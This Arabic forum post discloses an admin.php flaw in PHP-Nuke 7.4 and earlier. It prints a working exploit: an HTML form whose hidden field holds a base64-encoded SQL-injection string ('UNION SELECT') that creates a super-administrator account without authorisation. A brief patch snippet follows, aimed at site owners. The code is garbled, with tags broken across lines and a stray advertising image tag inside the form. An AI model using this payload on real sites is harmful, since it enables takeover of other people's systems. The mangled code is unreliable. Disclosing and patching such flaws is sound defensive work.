ثغرة النيوك الجديده , مع الترقيع !
السلام عليكم ورحمة الله وبركاته



الثغرة في ملف : Admin.php

وهي عبارة عن استثمار .. لخطاء برمجي بالملف ,,

يمّكن المخترق من الحصول على حساب ادامن في مجلة النيوك ,,

الاصدارات المصابة : 7.4 وما تحتها من اصدارات ,

وهذا جزء من الكود الاستثماري للثغرة طبعا كود html:


كود:


كود PHP:
                            NOME:  
    <
input type="text" 
name="add_name"
    <
br
    
PASSWORD

    <
input type="text" 

  
[IMG]http://cdn5.tribalfusion.com/media/37536.gif[/IMG]    
name="add_pwd"
    <
br
    
E-MAIL:  
    <
input type="text" 
name="add_email"
    <
br
    <
input type="hidden" 
name="admin" 
value="eCcgVU5JT04gU0VMRUNUIDEvKjox"
    <
br
    <
input type="hidden" 
name="add_radminsuper" value="1"
    <
br
    <
input type="hidden" 
name="op" 
value="AddAuthor"
  </
p
  <
p
    <
input type="submit" 
name="Submit" 
value="Create 
Admin"

    <
br
  </
p
</
form
الترقيع الصحيح :

قم باضافة هذة السطور الى ملف admin.php

كود:

كود PHP:
                            if ( !empty($HTTP_GET_VARS['op']) ) 

$op $HTTP_GET_VARS['op']; 


if ( !empty(
$HTTP_POST_VARS['op']) ) 

$op $HTTP_POST_VARS['op']; 

مكتشف الثغرة : غير معروف

مع التحية اخواني اصحاب المواقع